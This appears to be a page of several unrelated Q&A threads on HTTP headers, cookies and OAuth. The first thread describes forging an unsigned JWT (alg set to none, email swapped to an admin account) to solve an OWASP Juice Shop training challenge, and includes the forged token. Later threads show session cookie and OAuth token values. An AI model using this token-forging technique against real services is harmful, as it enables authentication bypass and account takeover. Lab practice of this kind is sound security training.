I recently deployed Juiceshop on Heroku and am trying to solve the challenge of forging an unsigned JWT token using Burpsuite. I followed the hints provided in the ebook starting from using burpsuite to get a valid JWT token from the request header using the proxy tab on the /rest/user/whoami URL and sent it to the repeater. In the repeater tab, I changed the alg property in the token to "none" and the email to "jwtn3d#juice-sh.op". I then encoded them in base64 and put a period after the header and payload respectively in the token value. When I send the request, I get a HTTP 200 OK status and the jwtn3d#juice-sh.op email is reflected as well, but the juiceshop challenge doesn't seem to be solved. When I reload the website, I'm not logged in as jwtn3d#juice-sh.op either.
Server: Cowboy
Connection: close
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Feature-Policy: payment 'self'
Set-Cookie: token=ewogICJ0eXAiOiAiSldUIiwKICAiYWxnIjogIm5vbmUiCn0.ewogICJzdGF0dXMiOiAic3VjY2VzcyIsCiAgImRhdGEiOiB7CiAgICAiaWQiOiAxLAogICAgInVzZXJuYW1lIjogIiIsCiAgICAiZW1haWwiOiAiand0bjNkQGp1aWNlLXNoLm9wIiwKICAgICJwYXNzd29yZCI6ICIwMTkyMDIzYTdiYmQ3MzI1MDUxNmYwNjlkZjE4YjUwMCIsCiAgICAicm9sZSI6ICJhZG1pbiIsCiAgICAiZGVsdXhlVG9rZW4iOiAiIiwKICAgICJsYXN0TG9naW5JcCI6ICIwLjAuMC4wIiwKICAgICJwcm9maWxlSW1hZ2UiOiAiYXNzZXRzL3B1YmxpYy9pbWFnZXMvdXBsb2Fkcy9kZWZhdWx0QWRtaW4ucG5nIiwKICAgICJ0b3RwU2VjcmV0IjogIiIsCiAgICAiaXNBY3RpdmUiOiB0cnVlLAogICAgImNyZWF0ZWRBdCI6ICIyMDIyLTAyLTA2IDExOjUyOjAxLjQwOSArMDA6MDAiLAogICAgInVwZGF0ZWRBdCI6ICIyMDIyLTAyLTA2IDExOjUyOjAxLjQwOSArMDA6MDAiLAogICAgImRlbGV0ZWRBdCI6IG51bGwKICB9LAogICJpYXQiOiAxNjQ0MTQ4NDcxLAogICJleHAiOiAxNjQ0MTY2NDcxCn0.; Path=/
Content-Type: application/json; charset=utf-8
Content-Length: 133
Etag: W/"85-PWOL8M3mYJv9caLvST18mm7K+2g"
Vary: Accept-Encoding
Date: Sun, 06 Feb 2022 11:57:25 GMT
Via: 1.1 vegur
{"user":{"id":1,"email":"jwtn3d#juice-sh.op","lastLoginIp":"0.0.0.0","profileImage":"assets/public/images/uploads/defaultAdmin.png"}}
I tried opening DevTools on the website and manually changing the cookie value to the forged token, and when I reloaded the website it reflected the jwtn3d#juice-sh.op email on the profile. But it still didn't solve the challenge. I've looked for tutorials everywhere and the challenges all seem to have just been solved once they sent the forged token over using the repeater, I'm at a loss as to why it isn't working in my case.
I found an alternative to using repeater, I used proxy intercept instead and changed the token value to the forged token on the /rest/user/whoami requests. That seemed to do the trick, though the notif pop up for the solved challenge didn't appear but it did show as solved in the scoreboard.
Related
I am doing a POST request in python using requests library then i am getting multiple set-cookies in the response headers out of 4 i got only 2 are being sent as cookies in my subsequent request.
response = session.request("POST", url1, data=payload1, headers=headers1,verify=False,cookies=previous_response.cookies)
When i send request as mentioned above all the set cookies from previous request headers must set as cookies but only few of then are being set
For eg
Set-Cookie: sp_ac=AQB1uO6eg3fKauhLNID7uLdT9wuD_9Qy-FtXYhfl68sGO4YkUL2tKpY_EXlV_SKvngDccQOI5BaKSdycCA5U-7h1N5LQ7HH5wjQbGXSB6o7pcKBvhRXsBne4zHSSFsdExwBQ0m_AwVo9d8UjkfUXiGtStI8vvF-p9ZJctNSrqf14DFh1juqZpK3cV_AplvJDVGgZEnALUa6JrBQJLZLXrUnDM4aBvPT9qNc;Version=1;Domain=accounts.spotify.com;Path=/;Secure;HttpOnly
Set-Cookie: sp_dc=AQDCboRdqnDFFtXA8px3gqjA3UkFXu5ikby1DsKg6D3v3LkholwIGSZizDHnSGuFHieuTsitpr8ubYApjQRaH2asYAuQGdzJ69zuzjPU8g;Version=1;Domain=spotify.com;Path=/;Max-Age=31536000;Secure;HttpOnly;Expires=Mon, 22 Jun 2020 13:03:15 GMT
Set-Cookie: csrf_token=AQB0q1XS7kZ5saul8QVL-7NIZVqrrAeeXW5OQUzjys8SQXTLUBf9M2wNOOQeyGU2cB-assn4XKqB9vRx;Version=1;Domain=accounts.spotify.com;Path=/;Secure
Set-Cookie: sp_key=59071bcb-664c-4302-b98b-6ba15d54f605;Version=1;Domain=spotify.com;Path=/;Max-Age=31536000;Secure;Expires=Mon, 22 Jun 2020 13:03:15 GMT
these are my previous response headers
In my next request only 2 are being sent, i dont know the reason behind it and to how to solve it
Cookie: sp_dc=AQDCboRdqnDFFtXA8px3gqjA3UkFXu5ikby1DsKg6D3v3LkholwIGSZizDHnSGuFHieuTsitpr8ubYApjQRaH2asYAuQGdzJ69zuzjPU8g; sp_key=59071bcb-664c-4302-b98b-6ba15d54f605
this is my new cookie header in new request
Well i figured out the answer after lot if research the hosts seems to be different
So what i have done is make a small notification in the post
Instead of this
response = session.request("POST", url1, data=payload1, headers=headers1,verify=False,cookies=previous_response.cookies)
I changed the cookies to dict so that it would be host independent as follows
response = session.request("POST", url1, data=payload1, headers=headers1,verify=False,cookies=previous_response.cookies.get_dict())
One of our applications is tested by Whitehat Sentinel and one of their findings was that in some cases our response header for Server is set to:
Microsoft-HTTPAPI/2.0
I have tried accessing the URL they identified with Postman and Fiddler but I do not see the Server header. I have also tried an online web sniffer http://web-sniffer.net/
Can someone advise how I can see this header?
In Chrome Network tab I see these headers
HTTP/1.1 404 Not Found
Content-Type: text/html
Strict-Transport-Security: max-age=300
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Date: Thu, 13 Jul 2017 13:59:15 GMT
Content-Length: 1245
No Server header.
The URL reported by Whitehat was not working for me, I changed the target URL to domain.com/%% and this caused the request to be handled by http.sys and it returned the Server attribute.
That is not the name of the header. That is the value found in the Server header when an application serves files over HTTP via http.sys, which is the kernel-mode HTTP server built into Windows.
For example, when serving a file via a C# HttpListener, I get this header:
Server: Microsoft-HTTPAPI/2.0
This header can be disabled by setting the following registry value:
Key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\HTTP\Parameters
Name: DisableServerHeader
Type: DWORD
Value: 1
I am trying to connect to Intuits v3 REST api, using node.js. I am using SuperAgent and superagent-oauth to make the requests. I generated the access tokens using Intuits Oauth playground. But I keep getting "ApplicationAuthenticationFailed; errorCode=003200; statusCode=401"
This is what I am using.
var OAuth = require('oauth')
,request = require('superagent');
require('superagent-oauth')(request);
var oauth = new OAuth.OAuth('','', consumerKey, consumerSecret, '1.0.A', null, 'HMAC-SHA1')
request.get("https://quickbooks.api.intuit.com/v3/company/672198300/customer/102")
.set('Content-Type', 'text/plain')
.accept('json')
.sign(oauth,accessToken,accessTokenSecret )
.end(function (err, res) {
console.log(res.text)
})
and here is the response
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<IntuitResponse time="2014-06-14T18:33:49.228-07:00" xmlns="http://schema.intuit.com/finance/v3">
<Fault type="AUTHENTICATION">
<Error code="3200">
<Message>message=ApplicationAuthenticationFailed; errorCode=003200; statusCode=401</Message>
</Error>
</Fault>
Can anyone shed any light on what is happening?
You could use the node.js client library
Like most other clients, that would save you from manually building http requests. Just provide the application credentials and the individual user credentials and you can simply call methods on a Javascript object. All of the REST endpoints have corresponding methods on the QuickBooks object, which follows node.js convention and takes an optional callback as the last argument.
SOlVED!
I used Postman to create the request. And it worked. Then I checked the oAuth header Postman had generated against the one I was generating with node ( I used requestBin to see the header of my request ). I discovered that the only real difference was that I was using "1.0A" as the version. Changing that to "1.0" worked!
var oauth = new OAuth.OAuth('','', consumerKey, consumerSecret, '1.0', null, 'HMAC-SHA1')
I do not have anything for ou in node.js but can provide you with raw request and response for the calls. Compare your raw requests against this. The signature should be double encoded.
Get Request token call-
GET https://oauth.intuit.com/oauth/v1/get_request_token?oauth_callback=oob&oauth_nonce=34562646-ab97-46e1-9aa7-f814d83ef9d1&oauth_consumer_key=qyprd7I5WvVgWDFnPoiBh1ejZn&oauth_signature_method=HMAC-SHA1&oauth_timestamp=1392306961&oauth_version=1.0&oauth_signature=0EtvSnzsuumeyib2fiEcnSyu8%3D HTTP/1.1
Host: oauth.intuit.com
HTTP/1.1 200 OK
Date: Thu, 13 Feb 2014 15:56:03 GMT
Server: Apache
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 150
Connection: close
Content-Type: text/plain
oauth_token_secret=dXhHHMS1EfdrQ32UabOMscIRWt5bLJNX3ZKljjBc&oauth_callback_confirmed=true&oauth_token=qyprdbwXdWrAt0xM2NgkLlJ79yCp4I2SmDg7tahDBPjA6Wti
Get Access Token-
GET https://oauth.intuit.com/oauth/v1/get_access_token?oauth_verifier=b4skra3&oauth_token=qyprde5fvI7WNOQjTKYLDzTVxJ2dLPTgQEQSPlDVGxEy9wZX&oauth_nonce=f20a5a4b-3635-40a8-92cf-697dfdb07b9d&oauth_consumer_key=qyprd7I5WvVgJZUvWDFnPoiBh1ejZn&oauth_signature_method=HMAC-SHA1&oauth_timestamp=1392397399&oauth_version=1.0&oauth_signature=gEVHttlM8IBAAkmi1dSNJgkKGsI%3D HTTP/1.1
Host: oauth.intuit.com
HTTP/1.1 200 OK
Date: Fri, 14 Feb 2014 17:03:20 GMT
Server: Apache
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 120
Connection: close
Content-Type: text/plain
oauth_token_secret=474gtp6xsFzNJ1EhrrjiHrTH96xXieaRLinjPomA&oauth_token=qyprdNIpWn2oYPupMpeH8Byf9Bhun5rPpIZZtTbNsPyFtbT4
When I punch in the URL for a secured database it displays the following message on the page:
{"error":"unauthorized","reason":"You are not authorized to access this db."}
Although this message certainly gets the point across I would prefer to redirect the user to a different page, like a login page. I've tried changing the authentication_redirect option in the couch config but no success. How would I go about doing this?
Authentication redirect is only works if client explicitly accepts text/html content type (e.g. sends Accept: text/html header):
GET /db HTTP/1.1
Accept: text/html
Host: localhost:5984
In this case, CouchDB will send HTTP 302 response instead of HTTP 401 which redirects on your authentication form, specified with authentication_redirect configuration option:
HTTP/1.1 302 Moved Temporarily
Cache-Control: must-revalidate
Content-Length: 78
Content-Type: text/plain; charset=utf-8
Date: Tue, 24 Sep 2013 01:32:40 GMT
Location: http://localhost:5984/_utils/session.html?return=%2Fdb&reason=You%20are%20not%20authorized%20to%20access%20this%20db.
Server: CouchDB/1.4.0 (Erlang OTP/R16B01)
{"error":"unauthorized","reason":"You are not authorized to access this db."}
Othewise CouchDB doesn't know was request send by human from browser or by application library. In the last case redirecting to the HTML form instead of raising HTTP error isn't suitable solution.
Problem: I can't seem to get FireFox to cache images sent from a dynamic server
Setup: Static Apache Server with reverse proxy to a dynamic server (mod_perl2) at backend.
Here is the request URL for the server. It is sent to the the dynamic server, where the cookie is used to validate access to the image:
Request Headers
Host: <OBSCURED>
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: <OBSCURED>
Cookie: pz_cred=4KCNr0RM15%2FJCOt%2BEa6%2BL62z%2Fxvbp2xNQHY5pJw5d6Q
Pragma: no-cache
Cache-Control: no-cache
The dynamic server streams the image back to the server, and provides the following response:
Response Headers
Date: Tue, 24 Nov 2009 04:28:07 GMT
Server: Apache/2.2.11 (Ubuntu) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Cache-Control: public, max-age=31536000
Content-Length: 25496
Content-Type: image/jpeg
Via: 1.1 127.0.1.1:8081
Keep-Alive: timeout=15, max=75
Connection: Keep-Alive
So far, so good (me thinks). However, on reload of the page, the image does not appear cached, and a request is again sent:
Request Headers
Host: <OBSCURED>
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: <OBSCURED>
Cookie: pz_cred=4KCNr0RM15%2FJCOt%2BEa6%2BL62z%2Fxvbp2xNQHY5pJw5d6Q
Cache-Control: max-age=0
It doesn't seem that request should happen as the browser should have cached the image. As it is, a 200 response is received, same as the first, and the image appears to be re-fetched (although the browser does appear to be using the cached images).
The problem appears to be hinted at by the Cache-Control: max-age=0 in the reload request header, above.
Does anyone know why this is happening? Perhaps it is the Via header in the response that is causing the problem?
The original request has
Cache-Control: no-cache
which tells all the intermediate HTTP caches (including Firefox's) that you don't want to use a cached response, you want to get the response from the origin web server itself.
The response says:
Cache-Control: public, max-age=31536000
which tells everyone that as far as the origin server is concerned, the response may be cached. The server seems to be configured to enable the PNG image to be cached: HTTP 1.1 (section 14.21) says:
Note: if a response includes a
Cache-Control field with the max-age
directive (see section 14.9.3), that
directive overrides the Expires field.
Your second request says:
Cache-Control: max-age=0
which tells all the intermediate HTTP caches that you won't take any cached response older than 0 seconds.
One thing to watch out for: if you hit the Reload button in Firefox, you are asking to reload from the origin web server. To test the caching of the image, navigate away from the page and back, or open it up in a new tab. Not sure why you saw no-cache the first time and max-age=0 the second though.
BTW, I like the FireBug plug-in for Firefox. You can take a look at the request and response headers with it and all sorts of other good stuff.
My previous answer was only partially correct.
The problem is the way FireFox 3 handles reload events. Apparently, it almost always requests content again from the origin server. Thus the Cache-Control: max-age=0 request header.
Firefox does use cached images to render a page on reload, but then it still makes all the requests to update them "in the background". It then replace them as they come in.
Therefore, the page renders fast, YSlow reports cached content. But the server is still getting nailed.
The resolution is to interrogate the incoming headers in the dynamic server script and determine if a 'If-Modified-Since' header is provided. If this is the case, and it is determined the content has not changed, an HTTP_NOT_MODIFIED (304) response is returned.
This is not optimal -- I'd rather Firefox not make the requests at all -- but it cuts the page load time in half, and greatly reduces bandwidth. Given the way Firefox works on reload, this appears the best solution.
Other Comments: Jim Ferran's point about navigating away from page and returning has merit -- the cache is always used, and no requests are outgoing (+1 to Jim). Also, content that is dynamically added (e.g. AJAX calls after the initial load) appear to use the cache as well.
Hope this helps someone besides me :)
Looks like solved it:
Removed the proxy via header
Added a Last-Modified header
Added a far-future expires date
Firebug still shows 200 responses from the origin server, however, YSlow recognizes the images as cached. According to YSlow, total image download size when fresh is greater than 500K; with the cache primed, it shows 0K download size.
Here is the response header from the Origin server which does the trick:
Date: Tue, 24 Nov 2009 08:54:24 GMT
Server: Apache/2.2.11 (Ubuntu) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Sun, 22 Nov 2009 07:28:25 GMT
Expires: Tue, 30 Nov 2010 19:00:25 GMT
Content-Length: 10883
Content-Type: image/jpeg
Keep-Alive: timeout=15, max=89
Connection: Keep-Alive
Because of the way I'm requesting the images, it really should not matter if these dates are static; my app knows the last mod time before requesting the image and appends this to the request URL on the client side to create a unique URL for each image version, e.g. http://myserver.com/img/125.jpg?20091122 (the info comes from a AJAX JSON feed). I could, for example, make the last modified date 01 Jan 2000, and the Expires date sometime in the year 2050.
If YSlow is correct -- and performance testing implies it is -- then FireBug should really report these local cache hits instead of a 200 response.